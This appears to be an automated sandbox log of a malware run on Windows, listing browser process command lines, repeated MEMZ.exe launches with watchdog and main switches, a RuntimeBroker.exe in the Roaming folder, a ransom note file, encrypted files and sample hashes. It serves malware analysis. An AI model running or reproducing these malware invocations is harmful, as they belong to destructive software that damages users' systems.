"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2080 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4268 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4408 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4540 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4752 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4432 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3224 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3500 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2064 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2692 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2684 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5356 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1644 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1484 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5152 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5204 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4740 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5344 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5236 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5544 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5756 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5636 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /main

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" \note.txt

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 77CD4EEA0315166438CDB2DBA3B1B727

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ir2r3plv.cmk.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_3852_EMFKEOQWSZHGPADJ

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

